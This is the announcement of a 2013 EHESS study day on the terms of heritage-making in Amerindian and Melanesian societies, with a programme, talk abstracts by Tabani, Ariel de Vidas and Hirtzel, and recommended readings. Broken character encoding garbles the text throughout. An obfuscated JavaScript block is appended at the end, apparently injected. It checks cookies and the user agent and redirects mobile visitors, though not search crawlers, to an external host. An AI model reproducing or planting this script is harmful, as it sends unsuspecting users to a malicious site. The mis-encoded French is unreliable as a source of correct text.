JOURNA�E D’A�TUDE FABRIQ’AM : Les termes de la patrimonialisation, 9 dA�cembre 2013, EHESS, Paris

LES TERMES DE LA PATRIMONIALISATIONA�

JournA�e FABRIQa��AM, 9 dA�cembre 2013

10h-17h

A�coles des Hautes A�tudes en Sciences Sociales

BA?timent Le France, 190 avenue de France, 75013 Paris

Salle du conseil B

Cette journA�e FABRIQa��AM sur les termes de la patrimonialisation se propose da��interroger les notions, concepts, mots et formules qui alimentent les processus de patrimonialisation au sein des sociA�tA�s amA�rindiennes que nous A�tudions. Quel est le vocabulaire A�laborA� dans ces processusA�? Dans quels contextes sont employA�s tels ou tels termesa�?A�? A� qui sont-ils destinA�sa�?A�? Da��oA? proviennent-ilsa�?A�? Quelles sont leursA�trajectoiresa�?? Quelles relationsA�entretiennent-ils avec les termes vernaculairesA�qui les ont prA�cA�dA�sa�?? Quels types de temporalitA� vA�hiculent-ilsa�?A�?

La contextualisation sociale et historique de la��usage de ces termes permettra sans doute de dA�terminer le rA�gime de savoir qui le soutient A� un moment et un lieu donnA�, toujours sujet A� la rA�troalimentation tout comme A� la fixation.

Cette approche contextualisA�eA�et comparatiste tentera de suivre les glissements sA�mantiques vers le mA�talangage de la patrimonialisation en sa��attachant aux pratiques, aux acteurs et aux interlocuteurs engagA�s dans la mise en A�uvre des ces processus. ElleA�essaiera de saisir le jeu des rA�fA�rents et des sens mis en relation A� la��action et A� leurs effetsA�sociaux.

Lectures recommandA�es pour cette sA�ance :

J. L. Austin, 1962,A�How to do things with words,A�Oxford, Clarendon Press.

L.A�Cuelenaere, 2013, A�a�? Paradoxes of Belief as Perceived in the Uses of Creer, Creencia, and Criyincia in the Northern Bolivian Highlands a�?A�,A�Ethnohistory, 60 : 1, pp. 77-100.

M.A�Tabani, 1999, A� a�?Kastom et traditionalismeA�: quelles inventions pour quelles traditions A� Tanna, VanuatuA�? a�?A�, Journal de la SociA�tA� des ocA�anistes, 109 (2), pp. 121-131.

A�****

PROGRAMME

La journA�e sera organisA�e en deux partiesa�?: trois communications dans la matinA�e (MA�lanA�sie, MA�soamA�rique, Andes) qui permettront da��engendrer un dA�but de comparatisme et de conceptualisation.A�Dans la��aprA?s-midi, nous nous attacherons A� analyser les diffA�rents termes employA�s au sein des sociA�tA�s amA�rindiennes que nous A�tudions afin de rA�flA�chir aux similitudes et diffA�rences rencontrA�es.

10h-12h30

A� Nous est un autre A�A�: Objectivation culturelle des identifications collectives A� Vanuatu

Marc TABANI (CNRS-CREDO)

La��usage da��ethnonymes, de gentilA�s et de toponymes pour affirmer une identitA� collective se singularise dans le contexte des peuples du Pacifique insulaire en comparaison de ceux des grands ensembles continentaux. On y retrouve rarement, notamment en MA�lanA�sie, da��endonyme se rapportant A� une humanitA� exclusive. Si la��on associe ce fait A� la��absence du couple notionnel A� tradition/nature A� et A� la��insistance sur le terme de route ou de chemin, les moyens de marquer des appartenances partagA�es y empruntent des formes insolites. AprA?s avoir volA�s en A�clat avec la christianisation, les marqueurs da��identitA�s se rapportant A� un patrimoine spirituel originel (nauta) sont dA�sormais la��objet, da��une reformulation idA�ologique da��un patrimoine dA�sormais objectivA� en termes de culture. La��historicisation des dispositifs de patrimonialisation sur la��A�le de Tanna et les rA�percussions de ces processus da��indentification collective A� la��A�chelle de la��ensemble de la��archipel de Vanuatu sera examinA� A� travers la��analyse du triptyque conceptuel A�A�cargoA�A�, A�A�coutumeA�A�, A�A�cultureA�A� (kago, kastom, kalja).

Coutumes et patrimoine. Une exploration A� travers diffA�rents rA�gimes de savoirs dans laA�HuastecaA�(Mexique)

AnathA�ARIEL DE VIDAS (CNRS-Mondes AmA�ricains)

Pourquoi dans de nombreuses communautA�s indiennes mexicaines utilise-t-on spA�cifiquement le terme espagnol A�A�costumbreA�A� pour dA�crire les pratiques rituelles considA�rA�es comme les plus traditionnelles et typiquement autochtonesA�? Quel serait le sens donnA�, au sein de groupes parlant des langues indigA?nes, A� l’utilisation de termes empruntA�s comme A�A�tradiciA?nA�A� quand ils auraient pu les traduire dans leur propre langue ou proposer des termes vernaculaires pour nommer les pratiques coutumiA?resA�? A� partir de donnA�es ethnographiques recueillies dans la rA�gion de la HuastA?que au nord-est du Mexique, ces questions sont examinA�es non par la��analyse des pratiques elles-mA?mes mais plutA?t A� travers les relations sociales mA�diatisA�es par ces pratiques. Cette approche permet de saisir la coexistence de diffA�rents rA�gimes de savoirs associA�s aux diffA�rents usages sociaux de ce qui est considA�rA� de maniA?re etic comme patrimoine.

Les A� mauvaises A� costumbres et la A� bonne A� cultura : les paradoxes da��un changement de paradigme (YurakarA� / Bolivie)

Vincent Hirtzel (EREA/LESC)

Les YurakarA� reprennent A� leur compte depuis les annA�es 2000 environ le changement terminologique qui a accompagnA� celui de leur statut en tant que populations indigA?nes au sein de la��A�tat bolivien. Lorsqua��ils se trouvaient exclut ou en marge de la��A�tat Bolivien, on leur attribuait des costumbres pour singulariser leur altA�ritA� et marquer leur extA�rioritA� A� la��A�tat. Aujourda��hui ils sont reconnus comme naciA?nA�; faisant partie intA�grante de la��A�tat, on leur accorde A�galement une cultura de plein droit. Ja��aborderai au cours de cette prA�sentation les paradoxes de ce changement drastique en prenant pour fil directeur la question suivanteA�: comment les YurakarA�, qui estiment avoir perdu leurs costumbres (ou plus exactement celles de leurs aA?eux) peuvent-ils envisager avoir maintenant et au futur une culturaA�?

14h-17h

Atelier autour des termesA�: cultura, tradiciA?n, costumbres, patrimonioa��

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}